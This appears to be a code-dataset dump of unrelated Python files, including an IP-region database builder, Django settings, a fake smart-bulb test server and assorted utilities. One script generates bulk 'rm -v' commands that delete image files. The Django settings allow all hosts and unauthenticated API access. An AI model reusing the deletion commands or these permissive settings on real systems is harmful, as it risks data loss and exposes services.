id (stringlengths 1-8) | text (stringlengths 6-1.05M) | dataset_id (stringclasses: 1 value)
---|---|---
4970496 | <reponame>theSage21/gmailcopy
import sqlite3
import arrow
def convert_arrowdatetime(s):
# sqlite3 hands converters raw bytes under Python 3, so decode before parsing
return arrow.get(s.decode("utf-8") if isinstance(s, bytes) else s)
def adapt_arrowdatetime(adt):
return adt.isoformat()
sqlite3.register_adapter(arrow.arrow.Arrow, adapt_arrowdatetime)
sqlite3.register_converter("timestamp", convert_arrowdatetime)
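# --- Usage sketch (added for illustration; not part of the original gmailcopy snippet) ---
# The Arrow adapter applies to any bound parameter, while the "timestamp" converter only
# runs when the connection enables declared-type parsing. The in-memory database and the
# table/column names below are assumptions, not taken from gmailcopy.
conn = sqlite3.connect(":memory:", detect_types=sqlite3.PARSE_DECLTYPES)
conn.execute("CREATE TABLE mails (received timestamp)")
conn.execute("INSERT INTO mails VALUES (?)", (arrow.utcnow(),))  # stored via adapt_arrowdatetime
restored, = conn.execute("SELECT received FROM mails").fetchone()  # parsed back by convert_arrowdatetime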
| StarcoderdataPython |
12800360 | #!/usr/bin/env python
# coding: utf-8
import os
import struct
import sys
import socket
current_path = os.path.dirname(os.path.abspath(__file__))
launcher_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, "launcher"))
root_path = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir))
top_path = os.path.abspath(os.path.join(root_path, os.pardir, os.pardir))
data_path = os.path.join(top_path, 'data', "smart_router")
if __name__ == '__main__':
python_path = os.path.join(root_path, 'python27', '1.0')
noarch_lib = os.path.abspath(os.path.join(python_path, 'lib', 'noarch'))
sys.path.append(noarch_lib)
import utils
from xlog import getLogger
xlog = getLogger("smart_router")
class IpRegion(object):
cn_ipv4_range = os.path.join(current_path, "cn_ipv4_range.txt")
cn_ipdb = os.path.join(data_path, "cn_ipdb.dat")
def __init__(self):
self.cn = "CN"
self.ipdb = self.load_db()
def load_db(self):
if not os.path.isfile(self.cn_ipdb):
self.generate_db()
with open(self.cn_ipdb, 'rb') as f:
# Read the IP range data length: big-endian ULong -> int
data_len, = struct.unpack('>L', f.read(4))
# Read the index data
index = f.read(224 * 4)
# Read the IP range data
data = f.read(data_len)
# Simple end-of-data marker check
if f.read(3) != b'end':
raise ValueError('%s file format error' % self.cn_ipdb)
# Read the update info
self.update = f.read().decode('ascii')
# Parse and cache the index data
# Splitting the data with a single struct.unpack call is more efficient
# Every 4 bytes form one index range (fip: BE short -> int), giving ordinals into the IP range data
self.index = struct.unpack('>' + 'h' * (224 * 2), index)
# Every 8 bytes hold one direct-connect IP range followed by one non-direct range
self.data = struct.unpack('4s' * (data_len // 4), data)
def check_ip(self, ip):
if ":" in ip:
return False
# Convert the IP to a big-endian Uint32 (actual type: bytes)
nip = socket.inet_aton(ip)
# Determine the index range
index = self.index
fip = ord(nip[0])
# Everything from 224 upward is a reserved/multicast address
if fip >= 224:
return True
fip *= 2
lo = index[fip]
if lo < 0:
return False
hi = index[fip + 1]
# Binary-search the IP ranges to locate this address
data = self.data
while lo < hi:
mid = (lo + hi) // 2
if data[mid] > nip:
hi = mid
else:
lo = mid + 1
# The parity of the position ordinal tells whether this is a direct-connect IP
return lo & 1
def check_ips(self, ips):
for ipd in ips:
if "|" in ipd:
ipl = ipd.split("|")
ip = ipl[0]
else:
ip = ipd
try:
if self.check_ip(ip):
return True
except Exception as e:
xlog.exception("check ip %s fail:%r", ip, e)
return False
def generate_db(self):
keeprange = (
'0.0.0.0/8', # Local ("this") network
'10.0.0.0/8', # Private network
'100.64.0.0/10', # Shared address space (carrier-grade NAT)
'127.0.0.0/8', # Loopback
'169.254.0.0/16', # Link-local
'172.16.0.0/12', # Private network
'192.0.0.0/24', # IANA reserved
'192.0.2.0/24', # TEST-NET-1
'192.88.99.0/24', # 6to4 relay
'192.168.0.0/16', # Private network
'198.18.0.0/15', # Network benchmark testing
'198.51.100.0/24', # TEST-NET-2
'203.0.113.0/24', # TEST-NET-3
# Contiguous addresses up to the end of the IPv4 space; handled specially
# '224.0.0.0/4', # Multicast (class D)
# '240.0.0.0/4', # Reserved (class E)
)
keeplist = []
for iprange in keeprange:
ip, mask = iprange.split('/')
keeplist.append((utils.ip_string_to_num(ip), 32 - int(mask)))
mask_dict = dict((str(2 ** i), i) for i in range(8, 25))
def int2bytes2(n, pack=struct.pack):
'''Convert an integer to 2 big-endian bytes'''
return pack('>H', n)
# return bytes(map(lambda b: (-1 >> b & 255), (8, 0)))
def int2bytes4(n, pack=struct.pack):
'''Convert an integer to 4 big-endian bytes'''
return pack('>I', n)
# return bytes(map(lambda b: (n >> b & 255), (24, 16, 8, 0)))
def bytes2int(s):
nchars = len(s)
# string to int or long. Type depends on nchars
x = sum(ord(s[byte]) << 8 * (nchars - byte - 1) for byte in range(nchars))
return x
# +---------+
# | 4 bytes | <- data length
# +---------------+
# | 224 * 4 bytes | <- first ip number index
# +---------------+
# | 2n * 4 bytes | <- cn ip ranges data
# +------------------------+
# | b'end' and update info | <- end verify
# +------------------------+
lastip_s = 0
lastip_e = 0
index = {}
index_n = 0
index_fip = -1
offset = 0
padding = b'\xff\xff'
update = ""
iplist = []
fdi = open(self.cn_ipv4_range,"r")
for line in fdi.readlines():
lp = line.split()
iplist.append((utils.ip_string_to_num(lp[0]), mask_dict[lp[1]]))
iplist.extend(keeplist)
# Sort by start address; the merge below requires ordered ranges
iplist.sort(key=lambda x: x[0])
# Rough estimate of the buffer size
buffering = len(iplist) * 8 + 224 * 4 + 64 + 4
buffer = bytearray(buffering)
for ip, mask in iplist:
ip_s = ip >> mask << mask
ip_e = (ip >> mask) + 1 << mask
# Check whether this range is contiguous with the previous one
if ip_s <= lastip_e:
# Check whether it extends beyond the previous range
if ip_e > lastip_e:
lastip_e = ip_e
continue
# Skip the initial (zero) value
if lastip_e:
# A range is written as an included start and an excluded end
buffer[offset:] = lastip_s = int2bytes4(lastip_s)
buffer[offset + 4:] = int2bytes4(lastip_e)
# An index entry is split into a start and an end
fip = ord(lastip_s[0]) * 2
if fip != index_fip:
# Close the previous index entry one ordinal further on,
# so addresses between its last range and the next index's first range stay searchable
index[index_fip + 1] = index_b = int2bytes2(index_n)
# Start of the current index entry
index[fip] = index_b
index_fip = fip
index_n += 2
offset += 8
lastip_s = ip_s
lastip_e = ip_e
# Append the final range
buffer[offset:] = lastip_s = int2bytes4(lastip_s)
buffer[offset + 4:] = int2bytes4(lastip_e)
fip = ord(lastip_s[0]) * 2
if fip != index_fip:
index[index_fip + 1] = index_b = int2bytes2(index_n)
index[fip] = index_b
index_n += 2
offset += 8
# Append the final closing index entry
index[fip + 1] = int2bytes2(index_n)
# Write to file
fd = open(self.cn_ipdb, 'wb', buffering)
fd.write(int2bytes4(offset))
for i in xrange(224 * 2):
fd.write(index.get(i, padding))
fd.write(buffer[:offset])
fd.write('endCN IP from ')
fd.write(update.encode(u'ascii'))
count = int(index_n // 2)
fd.write(', range count: %d' % count)
fd.close()
xlog.debug('include IP range number:%s' % count)
xlog.debug('save to file:%s' % self.cn_ipdb)
class UpdateIpRange(object):
cn_ipv4_range = os.path.join(current_path, "cn_ipv4_range.txt")
def __init__(self):
fn = os.path.join(data_path, "apnic.txt")
self.download_apnic(fn)
self.save_apnic_cniplist(fn)
def download_apnic(self, fn):
import subprocess
import sys
import urllib2
url = 'https://ftp.apnic.net/apnic/stats/apnic/delegated-apnic-latest'
try:
data = subprocess.check_output(['wget', url, '-O-'])
except (OSError, AttributeError):
print >> sys.stderr, "Fetching data from apnic.net, " \
"it might take a few minutes, please wait..."
data = urllib2.urlopen(url).read()
with open(fn, "w") as f:
f.write(data)
return data
def save_apnic_cniplist(self, fn):
try:
fd = open(fn, "r")
fw = open(self.cn_ipv4_range, "w")
for line in fd.readlines():
if line.startswith(b'apnic|CN|ipv4'):
ip = line.decode().split('|')
if len(ip) > 5:
fw.write("%s %s\n" % (ip[3], ip[4]))
except Exception as e:
xlog.exception("parse_apnic_cniplist %s e:%r", fn, e)
if __name__ == '__main__':
#up = UpdateIpRange()
ipr = IpRegion()
print(ipr.check_ip("8.8.8.8"))
print(ipr.check_ip("172.16.58.3")) | StarcoderdataPython |
5117496 | """
Django settings for ebdjango project.
Generated by 'django-admin startproject' using Django 2.1.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Check whether we are running on a Linux system; enable debug mode when on Windows
if os.name == 'nt':
DEBUG = True
else:
DEBUG = False
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '<KEY>'
# SECURITY WARNING: don't run with debug turned on in production!
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'resume',
'frontend',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ebdjango.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ebdjango.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
if 'RDS_DB_NAME' in os.environ:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.environ['RDS_DB_NAME'],
'USER': os.environ['RDS_USERNAME'],
'PASSWORD': os.environ['RDS_PASSWORD'],
'HOST': os.environ['RDS_HOSTNAME'],
'PORT': os.environ['RDS_PORT'],
}
}
else:
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.postgresql_psycopg2',
# 'NAME': 'djangodev',
# 'USER': 'db_django',
# 'PASSWORD': '<PASSWORD>!',
# 'HOST': 'djangodev.cvpnrhsskucg.us-east-1.rds.amazonaws.com',
# 'PORT': '5432',
# }
# }
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'postgres',
'USER': 'postgres',
'PASSWORD': '<PASSWORD>!',
'HOST': '',
'PORT': '5432',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Brussels'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# Security settings
if not DEBUG:
SECURE_SSL_REDIRECT = True
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
else:
SECURE_SSL_REDIRECT = False
SESSION_COOKIE_SECURE = False
CSRF_COOKIE_SECURE = False
# REST API security settings
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.AllowAny',
]
} | StarcoderdataPython |
9744220 | import pygame.cdrom as face
def main():
face.init()
count = face.get_count()
if count == 0:
raw_input('There is no cdrom drive.')
elif count == 1:
cmd(face.CD(0))
else:
num = which_CD(count)
if num != -1:
cmd(face.CD(num))
face.quit()
def which_CD(maximum):
print 'You have %s cdrom drives.' % maximum
while True:
try:
num = int(raw_input('What cdrom drive do you want to use? '))
except ValueError:
print 'Please try typing a number.'
except:
return -1
else:
if 0 < num <= maximum:
return num - 1
print 'The number is out of range.'
def cmd(disc):
disc.init()
total = disc.get_numtracks()
table = map(disc.get_track_audio, range(total))
if sum(table) == 0:
print 'This is not an audio CD.'
else:
index = {}
count = 0
for i, b in enumerate(table):
if b:
count += 1
index[count] = i
cmd_line(disc, index)
disc.stop()
disc.quit()
def cmd_line(disc, index):
while True:
prompt = get_prompt()
if prompt == 'nop':
pass
elif prompt == 'help':
print 'help: get this message'
print 'nop: does nothing'
print 'total: shows total tracks'
print 'play: plays the selected track'
print 'quit: leaves the command line'
elif prompt == 'total':
print 'There are %s tracks.' % len(index)
elif prompt == 'play':
track = get_track(len(index))
if track != -1:
disc.play(index[track])
else:
print 'Okay ...'
elif prompt == 'quit':
return
else:
print '"%s" cannot be understood.' % prompt
def get_prompt():
try:
return raw_input('>>> ').lower()
except:
return 'nop'
def get_track(maximum):
while True:
try:
num = int(raw_input('What track should be played? '))
except ValueError:
print 'Please try typing a number.'
except:
return -1
else:
if 0 < num <= maximum:
return num
print 'The number is out of range.'
if __name__ == '__main__':
main()
| StarcoderdataPython |
1961216 | import os;
import util;
def main():
path_meta='/disk2/res11/tubePatches';
out_commands='/disk2/res11/commands_deleteAllImages.txt';
dirs=[os.path.join(path_meta,dir_curr) for dir_curr in os.listdir(path_meta) if os.path.isdir(os.path.join(path_meta,dir_curr))];
print len(dirs);
commands=[];
for dir_curr in dirs:
dirs_in=[os.path.join(dir_curr,dir_in) for dir_in in os.listdir(dir_curr) if os.path.isdir(os.path.join(dir_curr,dir_in))];
commands.extend(['rm -v '+dir_in+'/*.jpg' for dir_in in dirs_in]);
print len(commands);
print commands[:10];
util.writeFile(out_commands,commands);
if __name__=='__main__':
main(); | StarcoderdataPython |
157375 | default_app_config = 'business.staff_accounts.apps.UserManagementConfig'
"""
This app manages staff users.
Functions:
- Add staff users and set their initial details (department, staff type)
- Departmental and General Managers have predefined roles depending on the departments they can access
"""
| StarcoderdataPython |
113423 | <reponame>Ezra/musa-guesser
# -*- encoding: utf-8 -*-
"""
Provide conversion between Musa and other scripts, initially IPA
"""
from __future__ import absolute_import, division, print_function, unicode_literals
__author__ = "<NAME>"
__version__ = "0.1.0"
__license__ = "BSD"
import codecs
import collections
import csv
import itertools
import sys
def raw_open(filename):
if sys.version_info[0] < 3:
infile = open(filename, 'rb')
else:
infile = open(filename, 'r', newline='', encoding='utf8')
return infile
def load_tables(limit=None):
with raw_open('musa_table.csv') as csvfile:
reader = csv.reader(csvfile)
next(reader)  # skip header (works on both Python 2 and 3)
# musa char to list of ipa readings
musa_to_ipas = collections.defaultdict(list)
# ipa sequence to list of musa chars
ipa_to_musas = collections.defaultdict(list)
# for speed, test with just the head
if limit:
reader = itertools.islice(reader, limit)
for row in reader:
codepoint, trans, ipa_string, uni = row
musa_char = chr(int(codepoint, 16))
ipas = ipa_string.split()
if trans == 'xd': # interpunct <=> space
ipas.append(' ')
# build the data structures
musa_to_ipas[musa_char] = ipas
for ipa in ipas:
ipa_to_musas[ipa].append(musa_char)
return musa_to_ipas, ipa_to_musas
def test_it():
musa_to_ipas, ipa_to_musas = load_tables(limit=10)
for d in [musa_to_ipas, ipa_to_musas]:
for k, vs in d.items():
if vs:
print(k)
for v in vs:
print('\t', v)
if __name__ == '__main__':
test_it()
else:
# load for importing
musa_to_ipas, ipa_to_musas = load_tables()
| StarcoderdataPython |
8194189 | <gh_stars>10-100
# Write your code here
n,x = input().split()
n = int(n)
x = int(x)
l = list(map(int,input().split()))
count = 0
flag = 0
for i in l:
if i <= x :
count += 1
else :
flag += 1
if flag == 2:
break
print(count)
| StarcoderdataPython |
1653609 | """Set up the file structure for the software. Specifies several folders:
software_dir: path of installation
"""
import inspect
import os
import warnings
from socket import getfqdn
import pandas as pd
from immutabledict import immutabledict
import typing as ty
import dddm
import numpy as np
export, __all__ = dddm.exporter()
__all__ += ['log']
context = {}
log = dddm.utils.get_logger('dddm')
_naive_tmp = '/tmp/'
_host = getfqdn()
base_detectors = [
dddm.detectors.examples.XenonSimple,
dddm.detectors.examples.ArgonSimple,
dddm.detectors.examples.GermaniumSimple,
dddm.detectors.xenon_nt.XenonNtNr,
dddm.detectors.xenon_nt.XenonNtMigdal,
dddm.detectors.super_cdms.SuperCdmsHvGeNr,
dddm.detectors.super_cdms.SuperCdmsHvSiNr,
dddm.detectors.super_cdms.SuperCdmsIzipGeNr,
dddm.detectors.super_cdms.SuperCdmsIzipSiNr,
dddm.detectors.super_cdms.SuperCdmsHvGeMigdal,
dddm.detectors.super_cdms.SuperCdmsHvSiMigdal,
dddm.detectors.super_cdms.SuperCdmsIzipGeMigdal,
dddm.detectors.super_cdms.SuperCdmsIzipSiMigdal,
]
class Context:
"""Centralized object for managing:
- configurations
- files
- detector objects
"""
_directories = None
_detector_registry = None
_samplers = immutabledict({
'nestle': dddm.samplers.nestle.NestleSampler,
'multinest': dddm.samplers.pymultinest.MultiNestSampler,
'emcee': dddm.samplers.emcee.MCMCStatModel,
'multinest_combined': dddm.samplers.multi_detectors.CombinedMultinest,
'nestle_combined': dddm.samplers.multi_detectors.CombinedNestle,
})
_halo_classes = immutabledict({
'shm': dddm.SHM,
'shielded_shm': dddm.ShieldedSHM,
})
def register(self, detector: dddm.Experiment):
"""Register a detector to the context"""
if self._detector_registry is None:
self._detector_registry = {}
existing_detector = self._detector_registry.get(detector.detector_name)
if existing_detector is not None:
log.warning(f'replacing {existing_detector} with {detector}')
self._check_detector_is_valid(detector)
self._detector_registry[detector.detector_name] = detector
def set_paths(self, paths: dict, tolerant=False):
if self._directories is None:
self._directories = {}
for reference, path in paths.items():
if not os.path.exists(path):
try:
os.mkdir(path)
except Exception as e:
if tolerant:
warnings.warn(f'Could not find {path} for {reference}', UserWarning)
else:
raise FileNotFoundError(
f'Could not find {path} for {reference}'
) from e
result = {**self._directories.copy(), **paths}
self._directories = result
def show_folders(self):
result = {'name': list(self._directories.keys())}
result['path'] = [self._directories[name] for name in result['name']]
result['exists'] = [os.path.exists(p) for p in result['path']]
result['n_files'] = [(len(os.listdir(p)) if os.path.exists(p) else 0) for p in
result['path']]
return pd.DataFrame(result)
def get_detector(self, detector: str, **kwargs):
if detector not in self._detector_registry:
raise NotImplementedError(f'{detector} not in {self.detectors}')
return self._detector_registry[detector](**kwargs)
def get_sampler_for_detector(self,
wimp_mass,
cross_section,
sampler_name: str,
detector_name: ty.Union[str, list, tuple],
prior: ty.Union[str, dict],
halo_name='shm',
detector_kwargs: dict = None,
halo_kwargs: dict = None,
sampler_kwargs: dict = None,
fit_parameters=dddm.statistics.get_param_list(),
):
self._check_sampler_args(wimp_mass, cross_section, sampler_name, detector_name, prior,
halo_name, detector_kwargs, halo_kwargs, sampler_kwargs,
fit_parameters)
sampler_class = self._samplers[sampler_name]
# If any class needs any of the paths, provide those here.
sampler_kwargs = self._add_folders_to_kwargs(sampler_class, sampler_kwargs)
halo_kwargs = self._add_folders_to_kwargs(
self._halo_classes.get(halo_name), halo_kwargs)
halo_model = self._halo_classes[halo_name](**halo_kwargs)
# TODO instead, create a super detector instead of smaller ones
if isinstance(detector_name, (list, tuple)):
if not sampler_class.allow_multiple_detectors:
raise NotImplementedError(f'{sampler_class} does not allow multiple detectors')
detector_instance = [
self.get_detector(
det,
**self._add_folders_to_kwargs(self._detector_registry.get(det),
detector_kwargs)
)
for det in detector_name]
if halo_name == 'shielded_shm':
if len(locations := {d.location for d in detector_instance}) > 1:
raise ValueError(
f'Running with multiple locations for shielded_shm is not allowed. Got {locations}')
halo_kwargs.setdefault('log_mass', np.log10(wimp_mass))
halo_kwargs.setdefault('log_cross_section', np.log10(cross_section))
halo_kwargs.setdefault('location', list(locations)[0])
spectrum_instance = [dddm.DetectorSpectrum(
experiment=d, dark_matter_model=halo_model)
for d in detector_instance]
else:
detector_kwargs = self._add_folders_to_kwargs(
self._detector_registry.get(detector_name), detector_kwargs)
detector_instance = self.get_detector(detector_name, **detector_kwargs)
spectrum_instance = dddm.DetectorSpectrum(experiment=detector_instance,
dark_matter_model=halo_model)
if isinstance(prior, str):
prior = dddm.get_priors(prior)
return sampler_class(wimp_mass=wimp_mass,
cross_section=cross_section,
spectrum_class=spectrum_instance,
prior=prior,
fit_parameters=fit_parameters,
**sampler_kwargs
)
def _check_sampler_args(self,
wimp_mass,
cross_section,
sampler_name: str,
detector_name: ty.Union[str, list, tuple],
prior: ty.Union[str, dict],
halo_name='shm',
detector_kwargs: dict = None,
halo_kwargs: dict = None,
sampler_kwargs: dict = None,
fit_parameters=dddm.statistics.get_param_list(),
):
for det in dddm.utils.to_str_tuple(detector_name):
assert det in self._detector_registry, f'{det} is unknown'
assert wimp_mass < 200 and wimp_mass > 0.001, f'{wimp_mass} invalid'
assert np.log10(cross_section) < -20 and np.log10(
cross_section) > -60, f'{cross_section} invalid'
assert sampler_name in self._samplers, f'choose from {self._samplers}, got {sampler_name}'
assert isinstance(prior, (str, dict, immutabledict)), f'invalid {prior}'
assert halo_name in self._halo_classes, f'invalid {halo_name}'
def _add_folders_to_kwargs(self, function, current_kwargs: ty.Union[None, dict]) -> dict:
if function is None:
return
if current_kwargs is None:
current_kwargs = {}
takes = inspect.getfullargspec(function).args
for directory, path in self._directories.items():
if directory in takes:
current_kwargs.update({directory: path})
return current_kwargs
@property
def detectors(self):
return sorted(list(self._detector_registry.keys()))
@staticmethod
def _check_detector_is_valid(detector: dddm.Experiment):
detector()._check_class()
@export
def base_context():
context = Context()
installation_folder = dddm.__path__[0]
default_context = {
'software_dir': installation_folder,
'results_dir': os.path.join(installation_folder, 'DD_DM_targets_data'),
'spectra_files': os.path.join(installation_folder, 'DD_DM_targets_spectra'),
'verne_folder': _get_verne_folder(),
'verne_files': _get_verne_folder(),
'tmp_folder': get_temp(),
}
context.set_paths(default_context)
for detector in base_detectors:
context.register(detector)
return context
def _get_verne_folder():
if not dddm.utils.is_installed('verne'):
return './verne'
import verne
return os.path.join(os.path.split(verne.__path__[0])[0], 'results')
def get_temp():
if 'TMPDIR' in os.environ and os.access(os.environ['TMPDIR'], os.W_OK):
tmp_folder = os.environ['TMPDIR']
elif 'TMP' in os.environ and os.access(os.environ['TMP'], os.W_OK):
tmp_folder = os.environ['TMP']
elif os.path.exists(_naive_tmp) and os.access(_naive_tmp, os.W_OK):
tmp_folder = _naive_tmp
else:
raise FileNotFoundError('No temp folder available')
return tmp_folder
def open_save_dir(save_as, base_dir=None, force_index=False, _hash=None):
"""
:param save_as: requested name of folder to open in the result folder
:param base_dir: folder where the save_as dir is to be saved in.
This is the results folder by default
:param force_index: option to force to write to a number (must be an
override!)
:param _hash: add a has to save_as dir to avoid duplicate naming
conventions while running multiple jobs
:return: the name of the folder as was saveable (usually input +
some number)
"""
if base_dir is None:
raise ValueError(save_as, base_dir, force_index, _hash)
if force_index:
results_path = os.path.join(base_dir, save_as + str(force_index))
elif _hash is None:
if force_index is not False:
raise ValueError(
f'do not set _hash to {_hash} and force_index to '
f'{force_index} simultaneously'
)
results_path = dddm.utils._folders_plus_one(base_dir, save_as)
else:
results_path = os.path.join(base_dir, save_as + '_HASH' + str(_hash))
dddm.utils.check_folder_for_file(os.path.join(results_path, "some_file_goes_here"))
log.info('open_save_dir::\tusing ' + results_path)
return results_path
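# Usage sketch (added): a minimal way to exercise the context defined above. It assumes
# dddm and its detector modules import cleanly in the current environment; detector names
# are whatever the registered Experiment classes report, so nothing is hard-coded here.
if __name__ == '__main__':
    ctx = base_context()
    print(ctx.detectors)       # names of all registered detectors
    print(ctx.show_folders())  # DataFrame of configured paths and whether they exist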
| StarcoderdataPython |
5025839 | """Start up a fake bulb to test features without a real bulb."""
import json
import socketserver
import threading
from typing import Any, Callable, Dict
def get_initial_pilot() -> Dict[str, Any]:
return {
"method": "getPilot",
"env": "pro",
"result": {
"mac": "ABCABCABCABC",
"rssi": -62,
"src": "",
"state": False,
"sceneId": 0,
"r": 255,
"g": 127,
"b": 0,
"c": 0,
"w": 0,
"temp": 0,
"dimming": 13,
},
}
def get_initial_sys_config() -> Dict[str, Any]:
return {
"method": "getSystemConfig",
"env": "pro",
"result": {
"mac": "a8bb5006033d",
"homeId": 653906,
"roomId": 989983,
"moduleName": "",
"fwVersion": "1.21.0",
"groupId": 0,
"drvConf": [20, 2],
"ewf": [255, 0, 255, 255, 0, 0, 0],
"ewfHex": "ff00ffff000000",
"ping": 0,
},
}
BULB_JSON_ERROR = b'{"env":"pro","error":{"code":-32700,"message":"Parse error"}}'
class BulbUDPRequestHandlerBase(socketserver.DatagramRequestHandler):
"""Class for UDP handler."""
pilot_state: Dict[str, Any] # Will be set by constructor for the actual class
sys_config: Dict[str, Any] # Will be set by constructor for the actual class
def handle(self) -> None:
"""Handle the request."""
data = self.rfile.readline().strip()
print(f"Request:{data!r}")
try:
json_data: Dict[str, Any] = dict(json.loads(data.decode()))
except json.JSONDecodeError:
self.wfile.write(BULB_JSON_ERROR)
return
method = str(json_data["method"])
if method == "setPilot":
return_data = self.setPilot(json_data)
self.wfile.write(return_data)
if method == "getPilot":
print(f"Response:{json.dumps(self.pilot_state)!r}")
self.wfile.write(bytes(json.dumps(self.pilot_state), "utf-8"))
if method == "getSystemConfig":
self.wfile.write(bytes(json.dumps(self.sys_config), "utf-8"))
def setPilot(self, json_data: Dict[str, Any]) -> bytes:
"""Change the values in the state."""
for name, value in json_data["params"].items():
self.pilot_state["result"][name] = value
return b'{"method":"setPilot","env":"pro","result":{"success":true}}'
def make_udp_fake_bulb_server(module_name: str) -> socketserver.ThreadingUDPServer:
"""Configure a fake bulb instance."""
pilot_state = get_initial_pilot()
sys_config = get_initial_sys_config()
sys_config["result"]["moduleName"] = module_name
BulbUDPRequestHandler = type(
"BulbUDPRequestHandler",
(BulbUDPRequestHandlerBase,),
{
"pilot_state": pilot_state,
"sys_config": sys_config,
},
)
udp_server = socketserver.ThreadingUDPServer(
server_address=("127.0.0.1", 38899),
RequestHandlerClass=BulbUDPRequestHandler,
)
return udp_server
def startup_bulb(module_name: str = "ESP01_SHRGB_03") -> Callable[[], Any]:
"""Start up the bulb. Returns a function to shut it down."""
server = make_udp_fake_bulb_server(module_name)
thread = threading.Thread(target=server.serve_forever)
thread.start()
return server.shutdown
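# Usage sketch (added): run the fake bulb briefly and then shut it down. The address
# 127.0.0.1:38899 comes from make_udp_fake_bulb_server above; the module name is just
# this function's default and serves only as an example value.
if __name__ == "__main__":
    shutdown = startup_bulb(module_name="ESP01_SHRGB_03")
    try:
        input("Fake bulb listening on 127.0.0.1:38899 - press Enter to stop...")
    finally:
        shutdown()  # stops the ThreadingUDPServer's serve_forever loop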
| StarcoderdataPython |
4906969 | <gh_stars>10-100
'''
Description:
Given a non-empty special binary tree consisting of nodes with the non-negative value, where each node in this tree has exactly two or zero sub-node. If the node has two sub-nodes, then this node's value is the smaller value among its two sub-nodes. More formally, the property root.val = min(root.left.val, root.right.val) always holds.
Given such a binary tree, you need to output the second minimum value in the set made of all the nodes' value in the whole tree.
If no such second minimum value exists, output -1 instead.
Example 1:
Input:
2
/ \
2 5
/ \
5 7
Output: 5
Explanation: The smallest value is 2, the second smallest value is 5.
Example 2:
Input:
2
/ \
2 2
Output: -1
Explanation: The smallest value is 2, but there isn't any second smallest value.
'''
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def findSecondMinimumValue(self, root: TreeNode) -> int:
first_minimum = root.val if (root) else (-1)
upper_bound = 2**31
second_minimum = upper_bound
def helper( node: TreeNode ):
if node:
helper( node.left )
helper( node.right )
nonlocal first_minimum, second_minimum
if node.val != first_minimum:
second_minimum = min( second_minimum, node.val)
# -------------------------------------------------------------
helper( root)
return second_minimum if second_minimum != upper_bound else -1
# n : the number of nodes in binary tree
## Time Complexity: O( n )
#
# The overhead in time is the cost DFS traversal, which is of O( n )
## Space Comlexity: O( n )
#
# The overhead in space is the storage for recursion call stack, which is of O( n )
def test_bench():
# Test-case #1
root_1 = TreeNode( 2 )
root_1.left = TreeNode( 2 )
root_1.right = TreeNode( 5 )
root_1.right.left = TreeNode( 5 )
root_1.right.right = TreeNode( 7 )
# expected output:
'''
5
'''
print( Solution().findSecondMinimumValue( root = root_1 ) )
# -----------------------------------
# Test-case #2
root_2 = TreeNode( 2 )
root_2.left = TreeNode(2)
root_2.right = TreeNode(2)
# expected output:
'''
-1
'''
print( Solution().findSecondMinimumValue( root = root_2 ) )
if __name__ == '__main__':
test_bench() | StarcoderdataPython |
3261931 | """
PyTorch-based implementations for the CATE estimators.
"""
from .flextenet import FlexTENet
from .pseudo_outcome_nets import (
DRLearner,
PWLearner,
RALearner,
RLearner,
ULearner,
XLearner,
)
from .representation_nets import DragonNet, TARNet
from .slearner import SLearner
from .snet import SNet
from .tlearner import TLearner
__all__ = [
"TLearner",
"SLearner",
"TARNet",
"DragonNet",
"XLearner",
"RLearner",
"ULearner",
"RALearner",
"PWLearner",
"DRLearner",
"SNet",
"FlexTENet",
]
| StarcoderdataPython |
3523733 | import abc
import logging
import os
import types
from substratools import utils
from substratools.workspace import Workspace
logger = logging.getLogger(__name__)
